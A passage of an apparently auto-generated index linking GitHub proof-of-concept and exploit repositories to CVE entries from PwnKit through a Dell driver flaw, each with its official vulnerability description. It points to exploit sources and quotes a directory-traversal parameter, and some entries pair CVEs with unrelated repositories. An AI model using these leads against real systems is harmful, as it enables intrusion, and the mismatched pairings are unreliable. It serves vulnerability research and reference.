- [Fato07/Pwnkit-exploit](https://github.com/Fato07/Pwnkit-exploit)
- [EstamelGG/CVE-2021-4034-NoGCC](https://github.com/EstamelGG/CVE-2021-4034-NoGCC)
- [pengalaman-1t/CVE-2021-4034](https://github.com/pengalaman-1t/CVE-2021-4034)
- [NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit](https://github.com/NeonWhiteRabbit/CVE-2021-4034-BASH-One-File-Exploit)
- [jpmcb/pwnkit-go](https://github.com/jpmcb/pwnkit-go)
- [JoyGhoshs/CVE-2021-4034](https://github.com/JoyGhoshs/CVE-2021-4034)
- [galoget/PwnKit-CVE-2021-4034](https://github.com/galoget/PwnKit-CVE-2021-4034)
- [Yakumwamba/POC-CVE-2021-4034](https://github.com/Yakumwamba/POC-CVE-2021-4034)
- [ayoub-elbouzi/CVE-2021-4034-Pwnkit](https://github.com/ayoub-elbouzi/CVE-2021-4034-Pwnkit)
- [Sakura-nee/CVE-2021-4034](https://github.com/Sakura-nee/CVE-2021-4034)
- [oreosec/pwnkit](https://github.com/oreosec/pwnkit)
- [CYB3RK1D/CVE-2021-4034-POC](https://github.com/CYB3RK1D/CVE-2021-4034-POC)
- [Rvn0xsy/CVE-2021-4034](https://github.com/Rvn0xsy/CVE-2021-4034)
- [Kirill89/CVE-2021-4034](https://github.com/Kirill89/CVE-2021-4034)
- [qq224015/CVE-2021-4034](https://github.com/qq224015/CVE-2021-4034)
- [NeonWhiteRabbit/CVE-2021-4034](https://github.com/NeonWhiteRabbit/CVE-2021-4034)
- [glowbase/PwnKit-CVE-2021-4034](https://github.com/glowbase/PwnKit-CVE-2021-4034)
- [sofire/polkit-0.96-CVE-2021-4034](https://github.com/sofire/polkit-0.96-CVE-2021-4034)
- [codiobert/pwnkit-scanner](https://github.com/codiobert/pwnkit-scanner)
- [v-rzh/CVE-2021-4034](https://github.com/v-rzh/CVE-2021-4034)
- [TW-D/PwnKit-Vulnerability_CVE-2021-4034](https://github.com/TW-D/PwnKit-Vulnerability_CVE-2021-4034)
- [OXDBXKXO/ez-pwnkit](https://github.com/OXDBXKXO/ez-pwnkit)
- [milot/dissecting-pkexec-cve-2021-4034](https://github.com/milot/dissecting-pkexec-cve-2021-4034)
- [0x01-sec/CVE-2021-4034-](https://github.com/0x01-sec/CVE-2021-4034-)
- [navisec/CVE-2021-4034-PwnKit](https://github.com/navisec/CVE-2021-4034-PwnKit)
- [Almorabea/pkexec-exploit](https://github.com/Almorabea/pkexec-exploit)
- [teelrabbit/Polkit-pkexec-exploit-for-Linux](https://github.com/teelrabbit/Polkit-pkexec-exploit-for-Linux)
- [scent2d/PoC-CVE-2021-4034](https://github.com/scent2d/PoC-CVE-2021-4034)
- [HrishitJoshi/CVE-2021-4034](https://github.com/HrishitJoshi/CVE-2021-4034)
- [Ankit-Ojha16/CVE-2021-4034](https://github.com/Ankit-Ojha16/CVE-2021-4034)
- [G01d3nW01f/CVE-2021-4034](https://github.com/G01d3nW01f/CVE-2021-4034)
- [drapl0n/pwnKit](https://github.com/drapl0n/pwnKit)
- [rvizx/CVE-2021-4034](https://github.com/rvizx/CVE-2021-4034)
- [Joffr3y/Polkit-CVE-2021-4034-HLP](https://github.com/Joffr3y/Polkit-CVE-2021-4034-HLP)
- [ziadsaleemi/polkit_CVE-2021-4034](https://github.com/ziadsaleemi/polkit_CVE-2021-4034)
- [FDlucifer/Pwnkit-go](https://github.com/FDlucifer/Pwnkit-go)
- [cspshivam/cve-2021-4034](https://github.com/cspshivam/cve-2021-4034)
- [an0n7os/CVE-2021-4034](https://github.com/an0n7os/CVE-2021-4034)
- [DanaEpp/pwncat_pwnkit](https://github.com/DanaEpp/pwncat_pwnkit)
- [x04000/CVE-2021-4034](https://github.com/x04000/CVE-2021-4034)
- [x04000/AutoPwnkit](https://github.com/x04000/AutoPwnkit)
- [hohn/codeql-sample-polkit](https://github.com/hohn/codeql-sample-polkit)
- [ck00004/CVE-2021-4034](https://github.com/ck00004/CVE-2021-4034)
- [LJP-TW/CVE-2021-4034](https://github.com/LJP-TW/CVE-2021-4034)
- [fnknda/CVE-2021-4034_POC](https://github.com/fnknda/CVE-2021-4034_POC)
- [Tanmay-N/CVE-2021-4034](https://github.com/Tanmay-N/CVE-2021-4034)
- [hahaleyile/CVE-2021-4034](https://github.com/hahaleyile/CVE-2021-4034)
- [movvamrocks/PwnKit-CVE-2021-4034](https://github.com/movvamrocks/PwnKit-CVE-2021-4034)
- [Squirre17/CVE-2021-4034](https://github.com/Squirre17/CVE-2021-4034)
- [Jesrat/make_me_root](https://github.com/Jesrat/make_me_root)
- [defhacks/cve-2021-4034](https://github.com/defhacks/cve-2021-4034)
- [ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034](https://github.com/ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034)
- [edsonjt81/CVE-2021-4034-Linux](https://github.com/edsonjt81/CVE-2021-4034-Linux)
- [nel0x/pwnkit-vulnerability](https://github.com/nel0x/pwnkit-vulnerability)
- [TomSgn/CVE-2021-4034](https://github.com/TomSgn/CVE-2021-4034)
- [battleoverflow/CVE-2021-4034](https://github.com/battleoverflow/CVE-2021-4034)
- [TheJoyOfHacking/berdav-CVE-2021-4034](https://github.com/TheJoyOfHacking/berdav-CVE-2021-4034)
- [tzwlhack/CVE-2021-4034](https://github.com/tzwlhack/CVE-2021-4034)
- [jcatala/f_poc_cve-2021-4034](https://github.com/jcatala/f_poc_cve-2021-4034)
- [Nosferatuvjr/PwnKit](https://github.com/Nosferatuvjr/PwnKit)
- [TotallyNotAHaxxer/CVE-2021-4034](https://github.com/TotallyNotAHaxxer/CVE-2021-4034)
- [rhin0cer0s/CVE-2021-4034](https://github.com/rhin0cer0s/CVE-2021-4034)
- [0x4ndy/CVE-2021-4034-PoC](https://github.com/0x4ndy/CVE-2021-4034-PoC)
- [antoinenguyen-09/CVE-2021-4034](https://github.com/antoinenguyen-09/CVE-2021-4034)
- [wudicainiao/cve-2021-4034](https://github.com/wudicainiao/cve-2021-4034)
- [TanmoyG1800/CVE-2021-4034](https://github.com/TanmoyG1800/CVE-2021-4034)
- [CronoX1/CVE-2021-4034](https://github.com/CronoX1/CVE-2021-4034)
- [supportingmx/cve-2021-4034](https://github.com/supportingmx/cve-2021-4034)
- [A1vinSmith/CVE-2021-4034](https://github.com/A1vinSmith/CVE-2021-4034)
- [HellGateCorp/pwnkit](https://github.com/HellGateCorp/pwnkit)
- [Silencecyber/cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034)
- [Geni0r/cve-2021-4034-poc](https://github.com/Geni0r/cve-2021-4034-poc)
- [zxc2007/CVE-2021-4034](https://github.com/zxc2007/CVE-2021-4034)
- [Pixailz/CVE-2021-4034](https://github.com/Pixailz/CVE-2021-4034)
- [toecesws/CVE-2021-4034](https://github.com/toecesws/CVE-2021-4034)
- [jehovah2002/CVE-2021-4034-pwnkit](https://github.com/jehovah2002/CVE-2021-4034-pwnkit)
- [fei9747/CVE-2021-4034](https://github.com/fei9747/CVE-2021-4034)
- [pyhrr0/pwnkit](https://github.com/pyhrr0/pwnkit)
- [mutur4/CVE-2021-4034](https://github.com/mutur4/CVE-2021-4034)
- [h3xcr4ck3r/CVE-2021-4034_Python3](https://github.com/h3xcr4ck3r/CVE-2021-4034_Python3)
- [TheSermux/CVE-2021-4034](https://github.com/TheSermux/CVE-2021-4034)
- [ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection](https://github.com/ps-interactive/lab_cve-2021-4034-polkit-emulation-and-detection)
- [asepsaepdin/CVE-2021-4034](https://github.com/asepsaepdin/CVE-2021-4034)
- [JohnGilbert57/CVE-2021-4034-Capture-the-flag](https://github.com/JohnGilbert57/CVE-2021-4034-Capture-the-flag)
- [Part01-Pai/Polkit-Permission-promotion-compiled](https://github.com/Part01-Pai/Polkit-Permission-promotion-compiled)
- [cdxiaodong/CVE-2021-4034-touch](https://github.com/cdxiaodong/CVE-2021-4034-touch)
- [LucasPDiniz/CVE-2021-4034](https://github.com/LucasPDiniz/CVE-2021-4034)
- [Pol-Ruiz/CVE-2021-4034](https://github.com/Pol-Ruiz/CVE-2021-4034)
- [cerodah/CVE-2021-4034](https://github.com/cerodah/CVE-2021-4034)
- [FancySauce/PwnKit-CVE-2021-4034](https://github.com/FancySauce/PwnKit-CVE-2021-4034)
- [wechicken456/CVE-2021-4034-CTF-writeup](https://github.com/wechicken456/CVE-2021-4034-CTF-writeup)
- [ASG-CASTLE/CVE-2021-4034](https://github.com/ASG-CASTLE/CVE-2021-4034)
- [X-Projetion/Exploiting-PwnKit-CVE-2021-4034-](https://github.com/X-Projetion/Exploiting-PwnKit-CVE-2021-4034-)
- [evkl1d/CVE-2021-4034](https://github.com/evkl1d/CVE-2021-4034)
- [Typical0day/CVE-2021-4034](https://github.com/Typical0day/CVE-2021-4034)
- [lsclsclsc/CVE-2021-4034](https://github.com/lsclsclsc/CVE-2021-4034)
- [EuJin03/CVE-2021-4034-PoC](https://github.com/EuJin03/CVE-2021-4034-PoC)

### CVE-2021-4043 (2022-02-04)

NULL Pointer Dereference in GitHub repository gpac/gpac prior to 1.1.0.

- [cyberark/PwnKit-Hunter](https://github.com/cyberark/PwnKit-Hunter)

### CVE-2021-4044 (2021-12-14)

Internally libssl in OpenSSL calls X509_verify_cert() on the client side to verify a certificate supplied by a server. That function may return a negative return value to indicate an internal error (for example out of memory). Such a negative return value is mishandled by OpenSSL and will cause an IO function (such as SSL_connect() or SSL_do_handshake()) to not indicate success and a subsequent call to SSL_get_error() to return the value SSL_ERROR_WANT_RETRY_VERIFY. This return value is only supposed to be returned by OpenSSL if the application has previously called SSL_CTX_set_cert_verify_callback(). Since most applications do not do this the SSL_ERROR_WANT_RETRY_VERIFY return value from SSL_get_error() will be totally unexpected and applications may not behave correctly as a result. The exact behaviour will depend on the application but it could result in crashes, infinite loops or other similar incorrect responses. This issue is made more serious in combination with a separate bug in OpenSSL 3.0 that will cause X509_verify_cert() to indicate an internal error when processing a certificate chain. This will occur where a certificate does not include the Subject Alternative Name extension but where a Certificate Authority has enforced name constraints. This issue can occur even with valid chains. By combining the two issues an attacker could induce incorrect, application dependent behaviour. Fixed in OpenSSL 3.0.1 (Affected 3.0.0).

- [phirojshah/CVE-2021-4044](https://github.com/phirojshah/CVE-2021-4044)

### CVE-2021-4045 (2022-03-07)

TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.

- [hacefresko/CVE-2021-4045](https://github.com/hacefresko/CVE-2021-4045)
- [jeffbezosispogg/CVE-2021-4045](https://github.com/jeffbezosispogg/CVE-2021-4045)
- [pl4int3xt/CVE-2021-4045](https://github.com/pl4int3xt/CVE-2021-4045)

### CVE-2021-4104 (2021-12-14)

JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

- [cckuailong/log4shell_1.x](https://github.com/cckuailong/log4shell_1.x)
- [open-AIMS/log4j](https://github.com/open-AIMS/log4j)

### CVE-2021-4154 (2022-02-04)

A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.

- [Markakd/CVE-2021-4154](https://github.com/Markakd/CVE-2021-4154)
- [veritas501/CVE-2021-4154](https://github.com/veritas501/CVE-2021-4154)

### CVE-2021-4191 (2022-03-28)

An issue has been discovered in GitLab CE/EE affecting versions 13.0 to 14.6.5, 14.7 to 14.7.4, and 14.8 to 14.8.2. Private GitLab instances with restricted sign-ups may be vulnerable to user enumeration to unauthenticated users through the GraphQL API.

- [Adelittle/CVE-2021-4191_Exploits](https://github.com/Adelittle/CVE-2021-4191_Exploits)
- [K3ysTr0K3R/CVE-2021-4191-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-4191-EXPLOIT)

### CVE-2021-4204 (2022-08-24)

An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to an Improper Input Validation. This flaw allows a local attacker with a special privilege to crash the system or leak internal information.

- [tr3ee/CVE-2021-4204](https://github.com/tr3ee/CVE-2021-4204)

### CVE-2021-4428 (2023-07-18)

A vulnerability was found in the what3words Autosuggest Plugin up to 4.0.0 for WordPress. It has been classified as problematic. Affected is the function enqueue_scripts of the file w3w-autosuggest/public/class-w3w-autosuggest-public.php of the component Setting Handler. Manipulation with unknown data can exploit an information disclosure vulnerability. The attack can be launched over the network. Upgrading to version 4.0.1 resolves this issue. The patch is identified as dd59cbac5f86057d6a73b87007c08b8bfa0c32ac. Installing an upgrade is recommended as the best possible mitigation.

- [CERT-hr/Log4Shell](https://github.com/CERT-hr/Log4Shell)

### CVE-2021-6857
- [zi0n8/CVE-2021-6857](https://github.com/zi0n8/CVE-2021-6857)

### CVE-2021-6901
- [mooneee/cve-2021-6901](https://github.com/mooneee/cve-2021-6901)

### CVE-2021-10086
- [AK-blank/CVE-2021-10086](https://github.com/AK-blank/CVE-2021-10086)

### CVE-2021-20021 (2021-04-09)

A vulnerability in the SonicWall Email Security version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.

- [SUPRAAA-1337/CVE-2021-20021](https://github.com/SUPRAAA-1337/CVE-2021-20021)

### CVE-2021-20038 (2021-12-08)

A stack-based buffer overflow vulnerability in the SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as the 'nobody' user on the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances running firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.

- [jbaines-r7/badblood](https://github.com/jbaines-r7/badblood)
- [vesperp/CVE-2021-20038-SonicWall-RCE](https://github.com/vesperp/CVE-2021-20038-SonicWall-RCE)

### CVE-2021-20138 (2021-12-09)

An unauthenticated command injection vulnerability exists in multiple parameters in the Gryphon Tower router’s web interface at /cgi-bin/luci/rc. An unauthenticated remote attacker on the same network can execute commands as root on the device by sending a specially crafted malicious packet to the web interface.

- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-20138)

### CVE-2021-20233 (2021-03-03)

A flaw was found in grub2 in versions prior to 2.06. Setparam_prefix() in the menu rendering code performs a length calculation on the assumption that expressing a quoted single quote will require 3 characters, while it actually requires 4 characters which allows an attacker to corrupt memory by one byte for each quote in the input. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

- [pauljrowland/BootHoleFix](https://github.com/pauljrowland/BootHoleFix)

### CVE-2021-20253 (2021-03-09)

A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

- [mbadanoiu/CVE-2021-20253](https://github.com/mbadanoiu/CVE-2021-20253)

### CVE-2021-20294 (2021-04-29)

A flaw was found in binutils readelf 2.35 program. An attacker who is able to convince a victim using readelf to read a crafted file could trigger a stack buffer overflow, out-of-bounds write of arbitrary data supplied by the attacker. The highest impact of this flaw is to confidentiality, integrity, and availability.

- [tin-z/CVE-2021-20294-POC](https://github.com/tin-z/CVE-2021-20294-POC)

### CVE-2021-20323 (2022-03-25)

A POST-based reflected Cross Site Scripting vulnerability has been identified in Keycloak.

- [ndmalc/CVE-2021-20323](https://github.com/ndmalc/CVE-2021-20323)
- [Cappricio-Securities/CVE-2021-20323](https://github.com/Cappricio-Securities/CVE-2021-20323)
- [cscpwn0sec/CVE-2021-20323](https://github.com/cscpwn0sec/CVE-2021-20323)

### CVE-2021-20717 (2021-05-10)

Cross-site scripting vulnerability in EC-CUBE 4.0.0 to 4.0.5 allows a remote attacker to inject a specially crafted script in the specific input field of the EC web site which is created using EC-CUBE. As a result, it may lead to an arbitrary script execution on the administrator's web browser.

- [s-index/CVE-2021-20717](https://github.com/s-index/CVE-2021-20717)

### CVE-2021-20837 (2021-10-26)

Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability.

- [ghost-nemesis/cve-2021-20837-poc](https://github.com/ghost-nemesis/cve-2021-20837-poc)
- [orangmuda/CVE-2021-20837](https://github.com/orangmuda/CVE-2021-20837)
- [Cosemz/CVE-2021-20837](https://github.com/Cosemz/CVE-2021-20837)
- [bb33bb/CVE-2021-20837](https://github.com/bb33bb/CVE-2021-20837)

### CVE-2021-21014 (2021-02-11)

Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker. Access to the admin console is required for successful exploitation.

- [HoangKien1020/CVE-2021-21014](https://github.com/HoangKien1020/CVE-2021-21014)

### CVE-2021-21017 (2021-02-11)

Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [ZeusBox/CVE-2021-21017](https://github.com/ZeusBox/CVE-2021-21017)
- [tzwlhack/CVE-2021-21017](https://github.com/tzwlhack/CVE-2021-21017)

### CVE-2021-21042 (2021-02-11)

Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Read vulnerability that could lead to arbitrary disclosure of information in the memory stack. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [NattiSamson/CVE-2021-21042](https://github.com/NattiSamson/CVE-2021-21042)
- [r1l4-i3pur1l4/CVE-2021-21042](https://github.com/r1l4-i3pur1l4/CVE-2021-21042)

### CVE-2021-21086 (2021-09-02)

Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an Out-of-bounds Write vulnerability in the CoolType library. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

- [infobyte/Exploit-CVE-2021-21086](https://github.com/infobyte/Exploit-CVE-2021-21086)

### CVE-2021-21110 (2021-01-08)

Use after free in safe browsing in Google Chrome prior to 87.0.4280.141 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.

- [Gh0st0ne/CVE-2021-21110](https://github.com/Gh0st0ne/CVE-2021-21110)

### CVE-2021-21123 (2021-02-09)

Insufficient data validation in File System API in Google Chrome prior to 88.0.4324.96 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page.

- [Puliczek/CVE-2021-21123-PoC-Google-Chrome](https://github.com/Puliczek/CVE-2021-21123-PoC-Google-Chrome)

### CVE-2021-21148 (2021-02-09)

Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [Grayhaxor/CVE-2021-21148](https://github.com/Grayhaxor/CVE-2021-21148)

### CVE-2021-21193 (2021-03-16)

Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [mehrzad1994/CVE-2021-21193](https://github.com/mehrzad1994/CVE-2021-21193)

### CVE-2021-21220 (2021-04-26)

Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [security-dbg/CVE-2021-21220](https://github.com/security-dbg/CVE-2021-21220)

### CVE-2021-21234 (2021-01-05)

spring-boot-actuator-logview is a library that adds a simple logfile viewer as a spring boot actuator endpoint. It is the maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory. The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy.

- [PwCNO-CTO/CVE-2021-21234](https://github.com/PwCNO-CTO/CVE-2021-21234)
- [xiaojiangxl/CVE-2021-21234](https://github.com/xiaojiangxl/CVE-2021-21234)

### CVE-2021-21239 (2021-01-21)

PySAML2 is a pure python implementation of the SAML Version 2 Standard. PySAML2 before 6.5.0 has an improper verification of cryptographic signature vulnerability. Users of pysaml2 that use the default CryptoBackendXmlSec1 backend and need to verify signed SAML documents are impacted. PySAML2 does not ensure that a signed SAML document is correctly signed. The default CryptoBackendXmlSec1 backend uses the xmlsec1 binary to verify the signature of signed SAML documents, but by default xmlsec1 accepts any type of key found within the given document. xmlsec1 needs to be configured explicitly to use only _x509 certificates_ for the verification of the SAML document signature. This is fixed in PySAML2 6.5.0.

- [RyanBoomer30/CVE-2021-21239-Exploit](https://github.com/RyanBoomer30/CVE-2021-21239-Exploit)

### CVE-2021-21300 (2021-03-09)

Git is an open-source distributed revision control system. In affected versions of Git, a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS may cause a just-checked-out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaround, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.6.

- [AlkenePan/CVE-2021-21300](https://github.com/AlkenePan/CVE-2021-21300)
- [Faisal78123/CVE-2021-21300](https://github.com/Faisal78123/CVE-2021-21300)
- [erranfenech/CVE-2021-21300](https://github.com/erranfenech/CVE-2021-21300)
- [Maskhe/CVE-2021-21300](https://github.com/Maskhe/CVE-2021-21300)
- [1uanWu/CVE-2021-21300](https://github.com/1uanWu/CVE-2021-21300)
- [Kirill89/CVE-2021-21300](https://github.com/Kirill89/CVE-2021-21300)
- [ETOCheney/cve-2021-21300](https://github.com/ETOCheney/cve-2021-21300)
- [fengzhouc/CVE-2021-21300](https://github.com/fengzhouc/CVE-2021-21300)
- [danshuizhangyu/CVE-2021-21300](https://github.com/danshuizhangyu/CVE-2021-21300)
- [0ahu/CVE-2021-21300](https://github.com/0ahu/CVE-2021-21300)
- [macilin/CVE-2021-21300](https://github.com/macilin/CVE-2021-21300)
- [Roboterh/CVE-2021-21300](https://github.com/Roboterh/CVE-2021-21300)
- [henry861010/Network_Security_NYCU](https://github.com/henry861010/Network_Security_NYCU)
- [Saboor-Hakimi-23/CVE-2021-21300](https://github.com/Saboor-Hakimi-23/CVE-2021-21300)

### CVE-2021-21311 (2021-02-11)

Adminer is an open-source database management tool in a single PHP file. In Adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.

- [llhala/CVE-2021-21311](https://github.com/llhala/CVE-2021-21311)
- [omoknooni/CVE-2021-21311](https://github.com/omoknooni/CVE-2021-21311)

### CVE-2021-21315 (2021-02-16)

The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. The problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... only allow strings and reject any arrays. String sanitization works as expected.

- [ForbiddenProgrammer/CVE-2021-21315-PoC](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC)
- [cherrera0001/CVE-2021-21315v2](https://github.com/cherrera0001/CVE-2021-21315v2)
- [MazX0p/CVE-2021-21315-exploit](https://github.com/MazX0p/CVE-2021-21315-exploit)
- [alikarimi999/CVE-2021-21315](https://github.com/alikarimi999/CVE-2021-21315)
- [G01d3nW01f/CVE-2021-21315](https://github.com/G01d3nW01f/CVE-2021-21315)
- [xMohamed0/CVE-2021-21315-POC](https://github.com/xMohamed0/CVE-2021-21315-POC)

### CVE-2021-21341 (2021-03-22)

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system, depending on CPU type or parallel execution of such a payload, resulting in a denial of service only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

- [s-index/CVE-2021-21341](https://github.com/s-index/CVE-2021-21341)
- [Mani1325/ka-cve-2021-21341](https://github.com/Mani1325/ka-cve-2021-21341)

### CVE-2021-21349 (2021-03-22)

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.

- [s-index/CVE-2021-21349](https://github.com/s-index/CVE-2021-21349)

### CVE-2021-21380 (2021-03-23)

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions of XWiki Platform (and only those with the Ratings API installed), the Rating Script Service exposes an API to perform SQL requests without escaping the from and where search arguments. This might lead to an SQL script injection quite easily for any user having Script rights on XWiki. The problem has been patched in XWiki 12.9RC1. The only workaround besides upgrading XWiki would be to uninstall the Ratings API in XWiki from the Extension Manager.

- [rvermeulen/codeql-workshop-cve-2021-21380](https://github.com/rvermeulen/codeql-workshop-cve-2021-21380)

### CVE-2021-21389 (2021-03-26)

BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.

- [HoangKien1020/CVE-2021-21389](https://github.com/HoangKien1020/CVE-2021-21389)

### CVE-2021-21402 (2021-03-23)

Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.

- [jiaocoll/CVE-2021-21402-Jellyfin](https://github.com/jiaocoll/CVE-2021-21402-Jellyfin)
- [somatrasss/CVE-2021-21402](https://github.com/somatrasss/CVE-2021-21402)
- [givemefivw/CVE-2021-21402](https://github.com/givemefivw/CVE-2021-21402)

### CVE-2021-21425 (2021-04-07)

Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of the administrator controller without needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of existing YAML files on the system. Successful exploitation of that vulnerability results in configuration changes, such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability, an adversary can change some part of the webpage, hijack an administrator account, or execute operating system commands under the context of the web-server user. This vulnerability is fixed in version 1.10.8. Blocking access to the `/admin` path from untrusted sources can be applied as a workaround.

- [CsEnox/CVE-2021-21425](https://github.com/CsEnox/CVE-2021-21425)
- [frknktlca/GravCMS_Nmap_Script](https://github.com/frknktlca/GravCMS_Nmap_Script)

### CVE-2021-21514 (2021-03-02)

Dell EMC OpenManage Server Administrator (OMSA) versions 9.5 and prior contain a path traversal vulnerability. A remote user with admin privileges could potentially exploit this vulnerability to view arbitrary files on the target system by sending a specially crafted URL request.

- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)

### CVE-2021-21551 (2021-05-04)

Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.

- [waldo-irc/CVE-2021-21551](https://github.com/waldo-irc/CVE-2021-21551)
- [ch3rn0byl/CVE-2021-21551](https://github.com/ch3rn0byl/CVE-2021-21551)
